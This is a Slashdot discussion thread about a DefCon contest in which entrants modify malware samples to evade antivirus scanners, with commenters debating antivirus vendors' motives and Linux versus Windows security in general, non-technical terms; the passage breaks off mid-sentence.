Malware Modification Contest Has Antivirus Vendors Upset

SkiifGeek writes "Race to Zero, a sideline competition being set up at this year's DefCon, already has some Antivirus vendors steaming over the objectives of the contest. They are upset because it is essentially a polymorphism exercise. Entrants are given a set of malware samples which they must then modify to pass through a battery of antivirus scanners without detection while still carrying a viable payload. Even if competitors ignore the published vulnerabilities and weaknesses affecting antivirus vendors, the competition should turn up some interesting results. It may provide technical insight and concepts for further research as similar competitions have done in the past."

Oh no!

[i_liek_turtles]

We may have to fix our software!

Re:Oh no!

[Frosty+Piss]

And really, I'm sorry, but what doesn't get these leaches in a tizzy? Anything that threatens their profit model....

Why should this upset them?

[FlyByPC]

By having some top-notch creative talent (never mind which color hat they're wearing) take a stab at creating new styles of malware under controlled conditions, they're giving the antivirus vendors a great opportunity to study these creations -- and therefore to be better able to protect against them.

Heck, if I were Symantec, McAffee et al -- I'd take the opportunity to try to *recruit* programmers who had interesting entries in the contest! (Better to have them working for you, right?)

Re:Why should this upset them?

[moosesocks]

Because polymorphism is considerably easier to implement than it is to circumvent (if it's even possible at all).

Essentially, this punches a huge hole in the security model of Norton and McAfee's product lines, rendering them completely ineffective against this sort of threat.

Personally, I've always found it remarkable that they've managed to hold on as long as they have, given just how deeply flawed the very notion of an Antivirus is.

As long as you've got a decently secure operating system, nothing more than a rudimentary antivirus should be necessary.

Re:Why should this upset them?

[GIL_Dude]

Sorry, the OS doesn't really make any difference (assuming you have a firewall - which all current operating systems do - to protect against buffer overflows found on inbound ports). What makes the difference is secure users.

I don't care how secure your OS is, if users are going to click on SomeFamousPersonNaked.exe , then they are going to eventually get owned - "secure" OS or not. We've all heard the "Linux doesn't get attacked much because it has an insignificant market share" and sort of argued around it - maybe the real one is "Linux doesn't get attacked much because the average Linux user knows enough to not click on ridiculous shit that gets emailed to them."

I run both Windows and Linux and the only time I have had a AV product tell me "oh noes, there is a virus" is when I have been manually TRYING to infect a system in order to reverse engineer what the damn thing does (in order to create cleanup packages for work). These are in non-networked VM's where we also re-image the host afterwards. But really - a secure USER is what we need. The OS won't make all that much difference compared to the user.

Re:Why should this upset them?

[v1]

Writing software is an investment. You put money in, you get money back. This contest DOES require them to put more money in, but they will get more money BACK. It's "forced investment". Now if you'd rather write a piece of software and then spend the next 6 years merely putting out new-os-compatibility updates, (and how many of those have we seen? many!) you will fall behind, and no one will care about upgrading to version 7 because there's nothing in 7 that their version 5 can't already do, and your product will wither. But that's what some are afraid of, being forced to continually improve their product. Some developers will see this not as an investment in their cash cow, but as an expense.

It's things like this that cause "version 2" to mean something and make us want to buy it. Bug fixes and compatibility updates don't make updates attractive, they don't pay the bills. New features and new functionality do. If anything, Symantec should be happy this is happening.

(and yes, I'm a programmer)

Re:Why should this upset them?

[moosesocks]

I don't care how secure your OS is, if users are going to click on SomeFamousPersonNaked.exe , then they are going to eventually get owned - "secure" OS or not. We've all heard the "Linux doesn't get attacked much because it has an insignificant market share" and sort of argued around it - maybe the real one is "Linux doesn't get attacked much because the average Linux user knows enough to not click on ridiculous shit that gets emailed to them." No. Linux and MacOS do not get attacked, because normal users don't run with the sort of privileges that would allow the virus (or trojan as in your example) to do very much damage or replicate itself.

Similarly, replication of such a virus becomes even more difficult, as E-mail clients and servers both generally tend to block attachments containing executables...

Sure, there are mechanisms for it to happen, but trojans generally don't spread very fast or very far. A true "virus" typically utilizes an OS exploit, or the fact that every *%*$#&ing Windows user runs with full administrative privileges.

Re:Why should this upset them?

[Jurily]

I was going to moderate, but I can't let this one slide.

normal users don't run with the sort of privileges that would allow the virus (or trojan as in your example) to do very much damage or replicate itself. A normal user has access to the network and a home directory. How is that not enough for a virus?

Sure, it can't burn itself into the registry or equivalent, but it sure as hell can replicate itself. Hell, it can even cause a lot of headaches when you're lazy like me and have a whole drive mounted in /home/jurily/stuff with full write access.

Trojans are a different beast, of course, as they rely on the OS more heavily.

Re:Why should this upset them?

[Timothy+Brownawell]

Linux and MacOS do not get attacked, because normal users don't run with the sort of privileges that would allow the virus (or trojan as in your example) to do very much damage or replicate itself.

WTF? Any program I run has +rw access to ~ (can start itself from .profile, do arbitrary damage to all the files I actually care about, and steal passwords and the like) and the ability to connect(2) to random parts of the internet (ability to replicate, send passwords, and fetch ads). No privileges beyond this are needed to cause trouble.

The real reason is probably more to do with the size and average competency of the userbase.

Re:Why should this upset them?

[Kjella]

We've all heard the "Linux doesn't get attacked much because it has an insignificant market share" and sort of argued around it - maybe the real one is "Linux doesn't get attacked much because the average Linux user knows enough to not click on ridiculous shit that gets emailed to them." Which would put a very low upper limit on Linux's market share. The way Linux saves the noobs is that you don't do it in the first place, you go to add/remove programs and find the software you want there. The way Linux saves the warez-wannabes is that Linux doesn't need cracks. I'm sure that if Linux became more mainstream with more commercial software, you could have trusted shops that you could add in the same way as repositories. Think something like tucows, cnet, snapfiles etc. only for Linux. Basicly, for 99% of the population going away from the "download random exes from the Intartubes" would be an upgrade to their security. Even if those sites only ran a basic virus scan and maybe on a tripwire machine. Users need a bigger difference between "opening" the jpg attachment and "opening" SomeFamousPersonNaked.jpg.exe, don't think users will get any smarter. Or just try to scare those users away from Linux so they don't spoil the average, though it'll make nobody safer nor any systems better.

Re:Why should this upset them?

[zwei2stein]

Exactly right, except you forgot one thing:

They dont need actually viruses and malware, they just need people (and businesses) to be afraid of them enough to consider them treat.

All you have to give to people is feeling of security and to make them think that you can shield them from any nasty stuff they might have heard on TV. And people are easily scared because they in general know little about computers.

People are scared and they get AVs (or careless and they wouldnt get AV even if there was billion of virii), so you fight for market share rather than install.

And your only feature you are ging to sell to those people is confidence of unpenetrable shield.

So yeah, AV companies do want perception of threat high and actually threat low. Thats when they make most money.

Every reall threat costs them money, Every imaginary threat makes them money.

Re:Why should this upset them?

[gbjbaanb]

not really. Once the AV company has enough viruses in the wild to persuade you to buy their product, all the viruses past that point is just a costly nuisance to them.

Re:Why should this upset them?

"dancingpigs.exe" is requesting extended access to your video services. dancingpigs.exe said:

"In order for the 3D functions in this video to work properly, you must give this picture access to your graphics card. Answering "no" will not allow you to enjoy this film! Answer "yes" to view dancing pigs!"

Would you like to give dancingpigs.exe root access to your video services?

(Yes) (No)

Guess which one the average user will pick...

Re:Why should this upset them?

[Dextrously]

The only thing anti-virus companies need to sell their product is the fear or threat of a virus. I suppose they believe there is more money in the fear mongering business than legitimate business. They may be right, I don't pretend to know. Having a virus scanner is pretty much a mindset in a windows environment. Even Windows Security Center will whine and complain if you don't have one (until you shoot it in the services.msc if you know what I mean).

Take for example, Network Intrusion Detection Systems. They are supposed to be set up *before* an intrusion takes place. Even if there is no history of previous intrusion, they validate that your network is actually secure. History should have shown us by now that the majority of hax0rs want not only get in your system, but remain their as silently and as long as possible. Thus, a detection system is needed.

An anti-virus companies selling pitch might be "How do you know you don't have a virus, if you don't have a virus scanner?". I am not an advocate for AV software, I'm just saying it as I see it.

Re:Why should this upset them?

WTF? Any program I run has +rw access to ~

A couple of points:

A: If viruses on Linux was a problem, how hard would it be for you to change this without breaking the program (think selinux, apparmor, forking and dropping privileges, virtulization, chroot jails etc... )?

B: If viruses on Linux were to become a problem, how quick would it be for distributions to do whatever the solution found in "A" was per default?

C: How many Linux users would actually google for CD burning software and download it from an untrusted site using a Linux machine?

Basically the only reason you are running Firefox with +rw to ~ is because it is considered an acceptable risk. Were trojans and viruses to start targeting, say Ubuntu, then it would be roughly 6 months, maybe 12 at a stretch , and then all internet facing applications would be sandboxed per default. If you didn't want to wait that long it would be relatively easy to make the changes yourself.

The problem with windows isn't that you can't make it secure. The problem is that you have to work really hard to do so, it is designed in a manner which encourages users to act in insecure ways, and the security measures very often seem to follow the mantra "the user can't blame us if we've told him he is insecure".

Btw, there is a big difference between compromising a user and full root privileges. If you have only compromised the user then it is fully possible for anti-virus software etc to have scans and sanity checks running as root that will spot the intrusion, whereas if you have compromised kernel space then you can destroy the defenses before they have a chance to alert the user. Of course, at the moment this is not necessary or even worthwhile on most Linux desktops, but it is definitely possible.

Re:Why should this upset them?

[MikeBabcock]

Sure, but unlike the Windows user, he can then log in as root and clean out his infection from his normal user account and move on with his life.

In the Windows case, I hope you have a backup because its time to re-install Windows.

PS, rkhunter is a great example of a program that detects for real Linux infections, for those looking.

Can you say Ralph Nader?

[zappepcs]

What would happen if Ralph got involved in the computer antivirus field?

lets translate FTFA

"It will do more harm than good to our company," said Paul Ferguson, a researcher with antivirus vendor TrendMicro. "Responsible disclosure is one thing, but now actually encouraging people to do this (as if the NSA isn't already doing so), as a contest is a little over the top.When really smart people start working on malicious software, we won't be able to keep up" Bold edits added by me.

How about this slogan "Unsafe with any version!"

I think they are afraid that regular joe end users are about to find out that programs meant to protect your pc are always an after the fact effort which leaves you vulnerable until you update and that there is no way to keep you safe from a zero-day facebook exploit. Even the government websites can be malicious until patched/fixed.

And soon, the conclusion will be ... uh, why pay for that. Spybot search and destroy is free, and ClamAV is free. I can just give them a one time donation and get just as good of protection... hmmmm These pricey programs really can't do all that much.

Wow, it would be such a shame if joe bloggs end user found out the truth. tisk tisk

Re:Can you say Ralph Nader?

[aaron.axvig]

"Unsafe with any version!"

Hence why I don't run any security products at all. They just pointlessly slow down your computer. I don't remember the last time I got infected (over 5 years?). Just have to be smart. But the security products don't help casual users either. Look at my family's computer...running AVG but someone went and downloaded a bunch of P2P crap and now there is no way short of a Windows re-install that will clean it up.

Depends on conditions...

[Fallen+Andy]

If this is being run like the hacking laptops thing recently, then what's the big deal? So long as the vulnerabilities are only disclosed to *all* AV vendors in private afterwards...

The AV vendors who are complaining are more afraid of *other* vendors than xploits... If anything found here goes to all then it levels the playing field open source style...

Andy

Re:Depends on conditions...

So long as the vulnerabilities are only disclosed to *all* AV vendors in private afterwards...

Who said anything about "in private"? I hope they post all the entries on their website. Shouldn't consumers have the right to know how they're vulnerable?

Besides, I hardly believe the Defcon crowd will go for a "Trust us, for reasons we can't disclose, the winner was ..." And with all the people at Defcon, the results are bound to get leaked somewhere anyway.

Re:Depends on conditions...

[phantomfive]

The fear they have is that people will realize how useless anti-virus software really is. If there are simple techniques to get around any anti-virus software, and the whole world knows it, then there's not much point in paying to run some AV software that just slows down your computer, is there? Already we know that AV software is useless against 0-day exploits, and if your vendor is making reasonably timed updates, your AV software only has nominal value anyway.

This contest will just go a little farther to help us understand exactly how useful AV software is. I am interested in seeing the results. AV software still has a place in the world, to scan emails to prevent exploits from people who don't patch their systems.

Maybe they should actually fix the problems?

[flyingfsck]

The present crop of virus scanners are a really dumb idea, since they don't provide any real protection. Consequently I am all for this kind of competition. Hopefully it will force Microsoft and the AV parasites to create a proper security solution for the MS crapware.

Re:Maybe they should actually fix the problems?

[Consul]

Well, the idea of Default Deny makes perfect sense to me. Tell the OS which programs are allowed to run, and notify me if something I have not explicitly allowed tries to execute, wherein I can take the opportunity to allow it or not. I run a total of a couple dozen programs, grand total, so it wouldn't be hard to get a system up and running after a new install.

Since you seem to be a security expert in your own right, beyond anything Marcus have ever done, feel free to explain why this basic idea will not work at all.

And he's not really my hero. Notice the smiley on the end there. I just think he has ideas that make sense.

Re:Eventuality

[maxwell+demon]

By Rice's theorem, proving any non-trivial property of a program is equivalent to the halting problem. Hence AV detection is an ultimately losing battle. But then, there is no need to be able to prove 100% that the software is harmful. The simple rule could be: If you cannot proof that it isn't harmful, it's a security risk. Of course for that rule to be useful, the class of programs where you can prove it has to be large enough to allow for any useful behaviour. This certainly is hard, and maybe it's not achievable, but I don't know of any proof for that.

Note that the halting problem does not say that you cannot write a program which can tell for some algorithms if they will halt. The halting problem says that no program can decide it on all algorithms. That makes algorithms deciding the halting problem (or an equivalent problem) for some algorithms no less obsolete than G\"odel's proof that not all true theorems can be proven makes proofs in mathematics obsolete.

What? A real world test? Ev1l H4x0|~z!

[Vellmont]

The vendors reply is just classic. It's essentially an admission that their products don't work. The whole AV industry is built on trying to idenitify existing viruses, and have a signature for them.

Of course, if you find the virus out in the wild and identify it, you've already failed for a lot of people. (but I'm sure they don't like to talk about that).

This is like a safe manufacturer objecting to someone actually trying to break open a safe like a real criminal would. "What! You used a crowbar and liquid nitrogen?! You're just letting the criminals know more about cold+crowbar usage!!! You should know OUR safes protect against sledgehammers VERY well."

Get real AV vendors. Everyone already knows you can't stand up to new viruses, and only protect against the known ones. People still buy your damn software anyway, because it's better than nothing.

Privileges are needed

[DrYak]

There's not need for elevated permissions.

No there is need. Under Linux a non privileged software has only access to high-level network access, such as opening a regular connection. There's no low-level access to network (crafting the data packets as wished) for non privileged software.

Thus a potential running virus, *COULD* connect to its C&C if it receives its orders from an IRC channel.
But the virus won't be able to create spoofed packets (used for sophisticated bounces and DDOS) or specially crafted packets to exploit flaws on the target system.
Whereas under Windows, non-privileged applications CAN craft packets, and users run as administrators anyway.

A non privileged process CAN download Ads from the internet, but it will have a harder time injecting them into the browser window.
An admin-privileged process in Windows could hijack the network stack and rewrite HTML on the fly inserting pop-ups and ads.
Under a non-privileged account in Linux, it can't. The virus will need instead to be able to rewrite the configuration of all gazillion of browser that exist in Linux, either injecting a spyware plugin or rerouting the traffic through a proxy process spawned by the virus. Anyway, the absence of a single point of attack, and the lack of monoculture make Linux a more complicated target.

Also, few user-friendly type distros (Ubuntu and the like) come with a sendmail (or equivalent) configured out-of-the-box for internet message delivery. Usually it's only configured to deliver alerts to the local user account.
A potential operational Spam bot would either have to send directly the spam to the internet and both hope that the network isn't configured to reject email not going out through the SMTP server and hope that the infected machine doesn't sit on a dynamic IP which will automatically get discarded on the receiving machine.
Or the potential Spam Bot will need additional complexity to retrieve the user's SMTP configuration, which will be difficult, both because there's a gazillion of different mail clients under linux, and both because several of them password-encrypt the credential (Thunderbird can do it and all KDE software store their passwords in KWallet which is masterpassword-encrypted by default).
This is security by diversity, and why it's good to avoid monocultures.
This is opposed to Windows, where most users have outlook express, which lacks the ability to encrypt the credentials.

Under Linux, it takes several step to execute code downloaded from a browser, as a reference, see the HOWTOs about downloading the latest GPU drivers straigth from the constructor site instead of using whatever is the regular package management/delivery mechanism used by the distro (you have to manually chmod it "executable". Clicking on it usually opens an editor).
And that's neglecting that it is possible to "noexec" the whole home, in which case it's not even possible to *run* code from ~.
So even if he wanted to, a linux user can't just click on "NataliePortmanNaked.sh" and execute it (unless its a regular package inside Synaptic or YaST, of course) whereas a Windows user can click on "PetrifiedWithHotGrits.exe".

Also, downloading software from random websites isn't as common in Linux as in Windows. Mostly only geeks download software for Linux and usually they download it in (controllable) source form, where anomalies could more easily get spotted.
The regular user will employ the package management system for the distro to get the needed package from the regular repository instead, as because of the diversity of Linux distros, he'll need a custom compiled packagee for the present distro,
ie.: Windows wanting kitten-powered screensaver will google around to find a page proposing some spyware infested screensaver. Anyone can download, but you *need* to be computer-literate and careful about your source to *avoid* getting undesired stuff.

The Linux users will browser Synaptic and download the package "omg-lol-ponie